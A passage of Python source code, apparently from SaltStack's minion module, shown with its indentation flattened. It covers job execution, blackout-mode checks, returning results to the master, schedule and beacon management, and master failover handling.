if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('matchers_refresh'):
self.matchers_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
